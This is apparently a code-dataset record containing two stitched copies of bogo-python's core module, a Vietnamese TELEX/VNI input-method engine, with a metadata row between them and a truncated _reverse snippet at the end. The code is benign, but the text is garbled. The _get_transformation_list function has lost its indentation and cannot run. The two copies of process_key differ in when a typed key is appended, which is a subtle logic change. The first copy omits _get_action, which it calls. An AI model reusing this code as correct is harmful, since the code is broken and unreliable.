# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
    # Kinds of effect a transformation can have on the current word.
    # Plain integer constants; values are compared with == in this module.
    UNDO = 3        # revert a previous transformation
    ADD_MARK = 2    # add a mark (hat, breve, horn, bar)
    ADD_ACCENT = 1  # add an accent (grave, acute, hook, tilde, dot)
    ADD_CHAR = 0    # append a literal character
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
    """Create a definition dictionary for the TELEX input method.

    Args:
        w_shorthand (optional): allow a stand-alone w to be
            interpreted as an ư. Default to True.
        brackets_shorthand (optional, True): allow typing ][ as
            shorthand for ươ. Default to True.

    Returns a dictionary to be passed into process_key().
    """
    definition = {
        "a": "a^",
        "o": "o^",
        "e": "e^",
        "w": ["u*", "o*", "a+"],
        "d": "d-",
        "f": "\\",
        "s": "/",
        "r": "?",
        "x": "~",
        "j": ".",
    }

    if w_shorthand:
        # A lone w also stands for ư.
        definition["w"] = definition["w"] + ['<ư']
    if brackets_shorthand:
        definition["]"] = "<ư"
        definition["["] = "<ơ"
        definition["}"] = "<Ư"
        definition["{"] = "<Ơ"
    return definition
def get_vni_definition():
    """Create a definition dictionary for the VNI input method.

    Returns a dictionary to be passed into process_key().
    """
    # Digits 6-9 add marks, digits 1-5 add accents.
    vni = {}
    vni["6"] = ["a^", "o^", "e^"]
    vni["7"] = ["u*", "o*"]
    vni["8"] = "a+"
    vni["9"] = "d-"
    vni["2"] = "\\"
    vni["1"] = "/"
    vni["3"] = "?"
    vni["4"] = "~"
    vni["5"] = "."
    return vni
def _accepted_chars(rules):
    """Return the set of characters the engine processes itself.

    Covers ASCII letters, every key bound in `rules`, the Vietnamese
    vowels (utils.VOWELS) and "đ". Anything outside this set is treated
    as a word separator by process_sequence().
    """
    if sys.version_info[0] > 2:
        ascii_letters = \
            string.ascii_letters
    else:
        # Python 2 fallback.
        ascii_letters = \
            string.lowercase + \
            string.uppercase
    return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
                     rules=None,
                     skip_non_vietnamese=True):
    """\
    Convert a key sequence into a Vietnamese string with diacritical marks.

    Args:
        rules (optional): see docstring for process_key().
        skip_non_vietnamese (optional): see docstring for process_key().

    It even supports continous key sequences connected by separators.
    i.e. process_sequence('con meof.ddieen') should work.
    """
    result = ""
    raw = result
    result_parts = []
    if rules is None:
        rules = get_telex_definition()

    accepted_chars = _accepted_chars(rules)

    for key in sequence:
        if key not in accepted_chars:
            # Any character outside the IM alphabet acts as a word
            # separator: flush the current word and start a new one.
            result_parts.append(result)
            result_parts.append(key)
            result = ""
            raw = ""
        else:
            # Feed each keystroke (and the raw fallback) back through
            # process_key().
            result, raw = process_key(
                string=result,
                key=key,
                fallback_sequence=raw,
                rules=rules,
                skip_non_vietnamese=skip_non_vietnamese)

    result_parts.append(result)
    return ''.join(result_parts)
def process_key(string, key,
                fallback_sequence="", rules=None,
                skip_non_vietnamese=True):
    """Process a keystroke.

    Args:
        string: The previously processed string or "".
        key: The keystroke.
        fallback_sequence: The previous keystrokes.
        rules (optional): A dictionary listing
            transformation rules. Defaults to get_telex_definition().
        skip_non_vietnamese (optional): Whether to skip results that
            doesn't seem like Vietnamese. Defaults to True.

    Returns a tuple. The first item of which is the processed
    Vietnamese string, the second item is the next fallback sequence.
    The two items are to be fed back into the next call of process_key()
    as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
    True and the resulting string doesn't look like Vietnamese,
    both items contain the `fallback_sequence`.

    >>> process_key('a', 'a', 'a')
    (â, aa)

    Note that when a key is an undo key, it won't get appended to
    `fallback_sequence`.

    >>> process_key('â', 'a', 'aa')
    (aa, aa)

    `rules` is a dictionary that maps keystrokes to
    their effect string. The effects can be one of the following:

    'a^': a with circumflex (â), only affect an existing 'a family'
    'a+': a with breve (ă), only affect an existing 'a family'
    'e^': e with circumflex (ê), only affect an existing 'e family'
    'o^': o with circumflex (ô), only affect an existing 'o family'
    'o*': o with horn (ơ), only affect an existing 'o family'
    'd-': d with bar (đ), only affect an existing 'd'
    '/': acute (sắc), affect an existing vowel
    '\\': grave (huyền), affect an existing vowel
    '?': hook (hỏi), affect an existing vowel
    '~': tilde (ngã), affect an existing vowel
    '.': dot (nặng), affect an existing vowel
    '<ư': append ư
    '<ơ': append ơ

    A keystroke entry can have multiple effects, in which case the
    dictionary entry's value should be a list of the possible
    effect strings. Although you should try to avoid this if
    you are defining a custom input method rule.
    """
    # TODO Figure out a way to remove the `string` argument. Perhaps only the
    # key sequence is needed?
    def default_return():
        # Append the key verbatim to both the output and the raw sequence.
        return string + key, fallback_sequence + key

    if rules is None:
        rules = get_telex_definition()

    # Split the current word into [first consonant, vowel, last consonant].
    comps = utils.separate(string)
    # if not _is_processable(comps):
    #     return default_return()

    # Find all possible transformations this keypress can generate
    trans_list = _get_transformation_list(
        key, rules, fallback_sequence)

    # Then apply them one by one
    new_comps = list(comps)
    for trans in trans_list:
        new_comps = _transform(new_comps, trans)

    if new_comps == comps:
        tmp = list(new_comps)

        # If none of the transformations (if any) work
        # then this keystroke is probably an undo key.
        if _can_undo(new_comps, trans_list):
            # The prefix "_" means undo.
            for trans in map(lambda x: "_" + x, trans_list):
                new_comps = _transform(new_comps, trans)

            # Undoing the w key with the TELEX input method with the
            # w:<ư extension requires some care.
            #
            # The input (ư, w) should be undone as w
            # on the other hand, (ư, uw) should return uw.
            #
            # _transform() is not aware of the 2 ways to generate
            # ư in TELEX and always think ư was created by uw.
            # Therefore, after calling _transform() to undo ư,
            # we always get ['', 'u', ''].
            #
            # So we have to clean it up a bit.
            def is_telex_like():
                return '<ư' in rules["w"]

            def undone_vowel_ends_with_u():
                return new_comps[1] and new_comps[1][-1].lower() == "u"

            def not_first_key_press():
                return len(fallback_sequence) >= 1

            def user_typed_ww():
                return (fallback_sequence[-1:]+key).lower() == "ww"

            def user_didnt_type_uww():
                return not (len(fallback_sequence) >= 2 and
                            fallback_sequence[-2].lower() == "u")

            if is_telex_like() and \
                    not_first_key_press() and \
                    undone_vowel_ends_with_u() and \
                    user_typed_ww() and \
                    user_didnt_type_uww():
                # The vowel part of new_comps is supposed to end with
                # u now. That u should be removed.
                new_comps[1] = new_comps[1][:-1]

        if tmp == new_comps:
            # Undoing changed nothing either: treat the key as a literal
            # character to append.
            fallback_sequence += key
            new_comps = utils.append_comps(new_comps, key)
    else:
        fallback_sequence += key

    if skip_non_vietnamese is True and key.isalpha() and \
            not is_valid_combination(new_comps, final_form=False):
        # The result is not plausible Vietnamese: fall back to the raw keys.
        result = fallback_sequence, fallback_sequence
    else:
        result = utils.join(new_comps), fallback_sequence
    return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _transform(comps, trans):
    """
    Transform the given string with transform type trans.

    `comps` is a 3-element [first consonant, vowel, last consonant]
    list as produced by utils.separate(); a new list is returned.
    """
    logging.debug("== In _transform(%s, %s) ==", comps, trans)
    components = list(comps)

    action, parameter = _get_action(trans)
    # Special case: "o^" on a standalone "oe"/"oa" cluster appends an
    # "o" instead of adding a circumflex.
    if action == _Action.ADD_MARK and \
            components[2] == "" and \
            mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
        action, parameter = _Action.ADD_CHAR, trans[0]

    if action == _Action.ADD_ACCENT:
        logging.debug("add_accent(%s, %s)", components, parameter)
        components = accent.add_accent(components, parameter)
    elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
        logging.debug("add_mark(%s, %s)", components, parameter)
        components = mark.add_mark(components, parameter)

        # Handle uơ in "huơ", "thuở", "quở"
        # If the current word has no last consonant and the first consonant
        # is one of "h", "th" and the vowel is "ươ" then change the vowel into
        # "uơ", keeping case and accent. If an alphabet character is then added
        # into the word then change back to "ươ".
        #
        # NOTE: In the dictionary, these are the only words having this strange
        # vowel so we don't need to worry about other cases.
        if accent.remove_accent_string(components[1]).lower() == "ươ" and \
                not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
            # Backup accents
            ac = accent.get_accent_string(components[1])
            components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
            components = accent.add_accent(components, ac)
    elif action == _Action.ADD_CHAR:
        if trans[0] == "<":
            if not components[2]:
                # Only allow ư, ơ or ươ sitting alone in the middle part
                # and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
                # will create ['g', 'i', '']. Therefore we have to allow
                # components[1] == 'i'.
                if (components[0].lower(), components[1].lower()) == ('g', 'i'):
                    components[0] += components[1]
                    components[1] = ''
                if not components[1] or \
                        (components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
                    components[1] += trans[1]
        else:
            components = utils.append_comps(components, parameter)
            # Restore the "uơ" special case back to "ươ" once another
            # letter is appended (see the uơ handling above).
            if parameter.isalpha() and \
                    accent.remove_accent_string(components[1]).lower().startswith("uơ"):
                ac = accent.get_accent_string(components[1])
                components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
                    ('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
                components = accent.add_accent(components, ac)
    elif action == _Action.UNDO:
        components = _reverse(components, trans[1:])

    if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
        # If there is any accent, remove and reapply it
        # because it is likely to be misplaced in previous transformations
        ac = accent.get_accent_string(components[1])
        if ac != accent.Accent.NONE:
            components = accent.add_accent(components, Accent.NONE)
            components = accent.add_accent(components, ac)

    logging.debug("After transform: %s", components)
    return components
def _reverse(components, trans):
    """
    Reverse the effect of transformation 'trans' on 'components'.

    If the transformation does not affect the components, return the
    original string.
    """
    action, parameter = _get_action(trans)
    comps = list(components)
    string = utils.join(comps)

    if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
        # Strip the appended character from the right-most non-empty part.
        if comps[2]:
            i = 2
        elif comps[1]:
            i = 1
        else:
            i = 0
        comps[i] = comps[i][:-1]
    elif action == _Action.ADD_ACCENT:
        comps = accent.add_accent(comps, Accent.NONE)
    elif action == _Action.ADD_MARK:
        if parameter == Mark.BAR:
            # The bar mark sits on the last character of the initial
            # consonant part (đ -> d).
            comps[0] = comps[0][:-1] + \
                mark.add_mark_char(comps[0][-1:], Mark.NONE)
        else:
            # Other marks live on the vowel part; strip them from every
            # vowel character.
            if mark.is_valid_mark(comps, trans):
                comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
                                    for c in comps[1]])
    return comps
def _can_undo(comps, trans_list):
    """
    Return whether a components can be undone with one of the
    transformations in trans_list.
    """
    comps = list(comps)
    # Accents present in the vowel part, marks present anywhere in the word.
    accent_list = list(map(accent.get_accent_char, comps[1]))
    mark_list = list(map(mark.get_mark_char, utils.join(comps)))
    action_list = list(map(lambda x: _get_action(x), trans_list))

    def atomic_check(action):
        """
        Check if the `action` created one of the marks, accents, or characters
        in `comps`.
        """
        return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
            or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
            or (action[0] == _Action.ADD_CHAR and action[1] ==
                accent.remove_accent_char(comps[1][-1]))  # ơ, ư

    return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
    """
    Returns a new raw_sequence after a backspace. This raw_sequence should
    be pushed back to process_sequence().
    """
    # I can't find a simple explanation for this, so
    # I hope this example can help clarify it:
    #
    # handle_backspace(thương, thuwongw) -> thuwonw
    # handle_backspace(thươn, thuwonw)   -> thuwow
    # handle_backspace(thươ, thuwow)     -> thuw
    # handle_backspace(thươ, thuw)       -> th
    #
    # The algorithm for handle_backspace was contributed by @hainp.
    if im_rules == None:
        im_rules = get_telex_definition()

    deleted_char = converted_string[-1]
    _accent = accent.get_accent_char(deleted_char)
    _mark = mark.get_mark_char(deleted_char)

    if _mark or _accent:
        # Find a sequence of IM keys at the end of
        # raw_sequence
        ime_keys_at_end = ""
        len_raw_sequence = len(raw_sequence)
        i = len_raw_sequence - 1
        while i >= 0:
            if raw_sequence[i] not in im_rules and \
                    raw_sequence[i] not in "aeiouyd":
                i += 1
                break
            else:
                ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
                i -= 1

        # Try to find a subsequence from that sequence
        # that can be converted to the deleted_char
        k = 0
        while k < len_raw_sequence:
            if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
                # Delete that subsequence
                raw_sequence = raw_sequence[:i + k]
                break
            k += 1
    else:
        # No diacritics involved: simply remove the last raw occurrence
        # of the deleted character.
        index = raw_sequence.rfind(deleted_char)
        raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
    return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _transform | python | def _transform(comps, trans):
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components | Transform the given string with transform type trans | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L365-L434 | [
"def strip(string):\n \"\"\"\n Strip a string of all marks and accents.\n \"\"\"\n return remove_mark_string(accent.remove_accent_string(string))\n",
"def get_accent_string(string):\n \"\"\"\n Get the first accent from the right of a string.\n \"\"\"\n accents = list(filter(lambda accent: ... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
    # Kinds of effect a transformation can have on the current word.
    # Plain integer constants; values are compared with == in this module.
    UNDO = 3        # revert a previous transformation
    ADD_MARK = 2    # add a mark (hat, breve, horn, bar)
    ADD_ACCENT = 1  # add an accent (grave, acute, hook, tilde, dot)
    ADD_CHAR = 0    # append a literal character
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
    """Create a definition dictionary for the TELEX input method.

    Args:
        w_shorthand (optional): allow a stand-alone w to be
            interpreted as an ư. Default to True.
        brackets_shorthand (optional, True): allow typing ][ as
            shorthand for ươ. Default to True.

    Returns a dictionary to be passed into process_key().
    """
    definition = {
        "a": "a^",
        "o": "o^",
        "e": "e^",
        "w": ["u*", "o*", "a+"],
        "d": "d-",
        "f": "\\",
        "s": "/",
        "r": "?",
        "x": "~",
        "j": ".",
    }

    if w_shorthand:
        # A lone w also stands for ư.
        definition["w"] = definition["w"] + ['<ư']
    if brackets_shorthand:
        definition["]"] = "<ư"
        definition["["] = "<ơ"
        definition["}"] = "<Ư"
        definition["{"] = "<Ơ"
    return definition
def get_vni_definition():
    """Create a definition dictionary for the VNI input method.

    Returns a dictionary to be passed into process_key().
    """
    # Digits 6-9 add marks, digits 1-5 add accents.
    vni = {}
    vni["6"] = ["a^", "o^", "e^"]
    vni["7"] = ["u*", "o*"]
    vni["8"] = "a+"
    vni["9"] = "d-"
    vni["2"] = "\\"
    vni["1"] = "/"
    vni["3"] = "?"
    vni["4"] = "~"
    vni["5"] = "."
    return vni
def _accepted_chars(rules):
    """Return the set of characters the engine processes itself.

    Covers ASCII letters, every key bound in `rules`, the Vietnamese
    vowels (utils.VOWELS) and "đ". Anything outside this set is treated
    as a word separator by process_sequence().
    """
    if sys.version_info[0] > 2:
        ascii_letters = \
            string.ascii_letters
    else:
        # Python 2 fallback.
        ascii_letters = \
            string.lowercase + \
            string.uppercase
    return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
                     rules=None,
                     skip_non_vietnamese=True):
    """\
    Convert a key sequence into a Vietnamese string with diacritical marks.

    Args:
        rules (optional): see docstring for process_key().
        skip_non_vietnamese (optional): see docstring for process_key().

    It even supports continous key sequences connected by separators.
    i.e. process_sequence('con meof.ddieen') should work.
    """
    result = ""
    raw = result
    result_parts = []
    if rules is None:
        rules = get_telex_definition()

    accepted_chars = _accepted_chars(rules)

    for key in sequence:
        if key not in accepted_chars:
            # Any character outside the IM alphabet acts as a word
            # separator: flush the current word and start a new one.
            result_parts.append(result)
            result_parts.append(key)
            result = ""
            raw = ""
        else:
            # Feed each keystroke (and the raw fallback) back through
            # process_key().
            result, raw = process_key(
                string=result,
                key=key,
                fallback_sequence=raw,
                rules=rules,
                skip_non_vietnamese=skip_non_vietnamese)

    result_parts.append(result)
    return ''.join(result_parts)
def process_key(string, key,
                fallback_sequence="", rules=None,
                skip_non_vietnamese=True):
    """Process a keystroke.

    Args:
        string: The previously processed string or "".
        key: The keystroke.
        fallback_sequence: The previous raw (untransformed) keystrokes.
        rules (optional): A dictionary listing
            transformation rules. Defaults to get_telex_definition().
        skip_non_vietnamese (optional): Whether to skip results that
            don't seem like Vietnamese. Defaults to True.

    Returns a tuple. The first item of which is the processed
    Vietnamese string, the second item is the next fallback sequence.
    The two items are to be fed back into the next call of process_key()
    as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
    True and the resulting string doesn't look like Vietnamese,
    both items contain the `fallback_sequence`.

    >>> process_key('a', 'a', 'a')
    ('â', 'aa')

    Note that when a key acts as an undo key, it won't get appended to
    `fallback_sequence`.

    >>> process_key('â', 'a', 'aa')
    ('aa', 'aa')

    `rules` is a dictionary that maps keystrokes to
    their effect string. The effects can be one of the following:

    'a^': a with circumflex (â), only affects an existing 'a family'
    'a+': a with breve (ă), only affects an existing 'a family'
    'e^': e with circumflex (ê), only affects an existing 'e family'
    'o^': o with circumflex (ô), only affects an existing 'o family'
    'o*': o with horn (ơ), only affects an existing 'o family'
    'd-': d with bar (đ), only affects an existing 'd'
    '/': acute (sắc), affects an existing vowel
    '\\': grave (huyền), affects an existing vowel
    '?': hook (hỏi), affects an existing vowel
    '~': tilde (ngã), affects an existing vowel
    '.': dot (nặng), affects an existing vowel
    '<ư': append ư
    '<ơ': append ơ

    A keystroke entry can have multiple effects, in which case the
    dictionary entry's value should be a list of the possible
    effect strings. Although you should try to avoid this if
    you are defining a custom input method rule.
    """
    # TODO Figure out a way to remove the `string` argument. Perhaps only the
    # key sequence is needed?
    def default_return():
        # NOTE(review): currently unreachable (its only call site is
        # commented out below); kept for the disabled fast path.
        return string + key, fallback_sequence + key
    if rules is None:
        rules = get_telex_definition()
    # Split the composed word into its (initial consonant, vowel,
    # final consonant) components.
    comps = utils.separate(string)
    # if not _is_processable(comps):
    #     return default_return()
    # Find all possible transformations this keypress can generate
    trans_list = _get_transformation_list(
        key, rules, fallback_sequence)
    # Then apply them one by one
    new_comps = list(comps)
    for trans in trans_list:
        new_comps = _transform(new_comps, trans)
    if new_comps == comps:
        tmp = list(new_comps)
        # If none of the transformations (if any) work
        # then this keystroke is probably an undo key.
        if _can_undo(new_comps, trans_list):
            # The prefix "_" means undo.
            for trans in map(lambda x: "_" + x, trans_list):
                new_comps = _transform(new_comps, trans)
            # Undoing the w key with the TELEX input method with the
            # w:<ư extension requires some care.
            #
            # The input (ư, w) should be undone as w
            # on the other hand, (ư, uw) should return uw.
            #
            # _transform() is not aware of the 2 ways to generate
            # ư in TELEX and always thinks ư was created by uw.
            # Therefore, after calling _transform() to undo ư,
            # we always get ['', 'u', ''].
            #
            # So we have to clean it up a bit.
            def is_telex_like():
                return '<ư' in rules["w"]
            def undone_vowel_ends_with_u():
                return new_comps[1] and new_comps[1][-1].lower() == "u"
            def not_first_key_press():
                return len(fallback_sequence) >= 1
            def user_typed_ww():
                return (fallback_sequence[-1:]+key).lower() == "ww"
            def user_didnt_type_uww():
                return not (len(fallback_sequence) >= 2 and
                            fallback_sequence[-2].lower() == "u")
            if is_telex_like() and \
                    not_first_key_press() and \
                    undone_vowel_ends_with_u() and \
                    user_typed_ww() and \
                    user_didnt_type_uww():
                # The vowel part of new_comps is supposed to end with
                # u now. That u should be removed.
                new_comps[1] = new_comps[1][:-1]
        if tmp == new_comps:
            # Nothing was undone either, so the key is an ordinary
            # character: record it in the raw sequence too.
            fallback_sequence += key
        new_comps = utils.append_comps(new_comps, key)
    else:
        fallback_sequence += key
    if skip_non_vietnamese is True and key.isalpha() and \
            not is_valid_combination(new_comps, final_form=False):
        # Fall back to the raw key sequence for non-Vietnamese words.
        result = fallback_sequence, fallback_sequence
    else:
        result = utils.join(new_comps), fallback_sequence
    return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
    """Decode a transformation string into an (action, parameter) pair.

    An _Action.ADD_MARK comes with a Mark, an _Action.ADD_ACCENT with
    an Accent, an _Action.ADD_CHAR with the character to append, and an
    _Action.UNDO with the transformation to reverse.
    """
    # TODO: VIQR-like convention
    head = trans[0]
    if head in ('<', '+'):
        # '<x' / '+x': append the character x.
        return _Action.ADD_CHAR, trans[1]
    if head == "_":
        # '_t': undo the effect of transformation t.
        return _Action.UNDO, trans[1:]
    if len(trans) == 2:
        # Two-character transforms place a mark, e.g. 'a^', 'd-'.
        marks = {
            '^': Mark.HAT,
            '+': Mark.BREVE,
            '*': Mark.HORN,
            '-': Mark.BAR,
        }
        return _Action.ADD_MARK, marks[trans[1]]
    # Single-character transforms place a tone accent.
    accents = {
        '\\': Accent.GRAVE,
        '/': Accent.ACUTE,
        '?': Accent.HOOK,
        '~': Accent.TIDLE,
        '.': Accent.DOT,
    }
    return _Action.ADD_ACCENT, accents[head]
def _reverse(components, trans):
    """Reverse the effect of transformation `trans` on `components`.

    If the transformation does not affect the components, the original
    components are returned unchanged.
    """
    action, parameter = _get_action(trans)
    comps = list(components)
    joined = utils.join(comps)
    if action == _Action.ADD_CHAR and joined[-1].lower() == parameter.lower():
        # Drop the trailing character from the right-most non-empty part.
        if comps[2]:
            part = 2
        elif comps[1]:
            part = 1
        else:
            part = 0
        comps[part] = comps[part][:-1]
    elif action == _Action.ADD_ACCENT:
        # Undoing a tone clears the accent on the vowel part.
        comps = accent.add_accent(comps, Accent.NONE)
    elif action == _Action.ADD_MARK:
        if parameter == Mark.BAR:
            # The BAR mark lives on the initial consonant (đ -> d).
            tail = comps[0][-1:]
            comps[0] = comps[0][:-1] + mark.add_mark_char(tail, Mark.NONE)
        elif mark.is_valid_mark(comps, trans):
            # Strip the mark from every character of the vowel part.
            cleaned = [mark.add_mark_char(c, Mark.NONE) for c in comps[1]]
            comps[1] = "".join(cleaned)
    return comps
def _can_undo(comps, trans_list):
    """Return whether `comps` can be undone by one of the
    transformations in `trans_list`.
    """
    comps = list(comps)
    accents_present = [accent.get_accent_char(c) for c in comps[1]]
    marks_present = [mark.get_mark_char(c) for c in utils.join(comps)]
    actions = [_get_action(t) for t in trans_list]
    def produced_part_of(action):
        # True if `action` produced one of the accents, marks, or
        # appended characters (ơ, ư) visible in `comps`.
        kind, param = action
        if kind == _Action.ADD_ACCENT:
            return param in accents_present
        if kind == _Action.ADD_MARK:
            return param in marks_present
        if kind == _Action.ADD_CHAR:
            return param == accent.remove_accent_char(comps[1][-1])
        return False
    return any(produced_part_of(a) for a in actions)
def handle_backspace(converted_string, raw_sequence, im_rules=None):
    """Return a new raw_sequence after a backspace.  This raw_sequence
    should be pushed back to process_sequence() to rebuild the display
    string.

    Example (TELEX rules):

        handle_backspace(thương, thuwongw) -> thuwonw
        handle_backspace(thươn, thuwonw) -> thuwow
        handle_backspace(thươ, thuwow) -> thuw
        handle_backspace(thươ, thuw) -> th

    The algorithm for handle_backspace was contributed by @hainp.
    """
    # NOTE(review): idiomatic form would be `im_rules is None`; left
    # untouched in this documentation-only pass.
    if im_rules == None:
        im_rules = get_telex_definition()
    # The character the backspace removes from the converted string.
    deleted_char = converted_string[-1]
    _accent = accent.get_accent_char(deleted_char)
    _mark = mark.get_mark_char(deleted_char)
    if _mark or _accent:
        # The deleted character carries a diacritic, so several raw
        # keystrokes may have produced it.
        # Find a sequence of IM keys at the end of
        # raw_sequence
        ime_keys_at_end = ""
        len_raw_sequence = len(raw_sequence)
        i = len_raw_sequence - 1
        while i >= 0:
            if raw_sequence[i] not in im_rules and \
                    raw_sequence[i] not in "aeiouyd":
                # Stop at the first key that cannot take part in an IM
                # composition; `i` now points just past it.
                i += 1
                break
            else:
                ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
                i -= 1
        # NOTE(review): if every key in raw_sequence is an IM key, the
        # loop exhausts with i == -1, so the slice below starts from the
        # *last* character instead of index 0 — looks like an off-by-one;
        # confirm intended behavior before changing.
        # Try to find a subsequence from that sequence
        # that can be converted to the deleted_char
        k = 0
        while k < len_raw_sequence:
            if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
                # Delete that subsequence
                raw_sequence = raw_sequence[:i + k]
                break
            k += 1
    else:
        # Plain character: drop its last occurrence from the raw keys.
        index = raw_sequence.rfind(deleted_char)
        raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
    return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _reverse | python | def _reverse(components, trans):
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
